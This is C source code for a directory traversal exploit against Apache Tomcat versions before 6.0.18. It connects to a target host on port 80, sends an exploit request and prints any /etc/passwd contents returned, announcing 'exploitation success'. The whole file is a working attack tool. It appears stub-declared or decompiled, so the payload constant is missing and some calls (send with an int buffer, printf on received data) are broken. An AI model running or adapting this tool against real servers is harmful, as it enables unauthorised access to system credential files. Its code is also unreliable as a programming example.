
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct in_addr {int dummy; } ;
struct sockaddr_in {int sin_zero; struct in_addr sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;


 int AF_INET ;
 int EXPLOIT ;
 int RCVBUFSIZE ;
 int SOCK_STREAM ;
 int close (int) ;
 int cls () ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int memset (int *,char,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int send (int,int ,int,int ) ;
 int socket (int ,int ,int ) ;
 int strstr (char*,int ) ;
 int tester ;

int main(int argc,char **argv)
{
if(argc<2)
  {

   cls();
   printf("\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\n");
   printf("\nc0d3r: mywisdom\n");
   printf("\nusage:./tomcatevil hotname\n");
   exit(1);
  }
else
 {

 int port=80;
 char echobuf[RCVBUFSIZE];
 int rval,sockfd, bytesrcv, totalbytes;
 struct hostent *he;
 struct sockaddr_in their_addr;
 if((he=gethostbyname(argv[1])) == ((void*)0))
  {
   perror("\nSorry please recheck your target hostname !\n");
   exit(1);
  }
  else
  {
   if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
     perror("socket()");
     exit(1);
    }
    else
    {

  their_addr.sin_family = AF_INET;

 printf("\n[-]Checking whether port %d opens or not\n",port);
 their_addr.sin_port = htons(port);
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8);
 if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  {
  perror("failed to connect !!!");

  }
 else
 {
 printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
 if(send(sockfd, EXPLOIT,999,0)==-1)
   {
 perror ("send");
   }
 else
   {
       totalbytes=0;
       while (totalbytes < RCVBUFSIZE)
        {

        if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
            {

            }
            else
            {
              totalbytes += bytesrcv;
              echobuf[bytesrcv] = '\0';

            }
           totalbytes++;
        }


   }

   if(echobuf)
       {

        rval=strstr (echobuf, tester);
          if(rval)
             {
            printf(echobuf);
            printf("\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\n");
            exit(1);
             }
             else
            {
            printf(echobuf);
            printf("\n[-]target not vulnerable !!!\n");
            exit(1);
            }
       }

 }
 close(sockfd);





    }
   }

 }


}
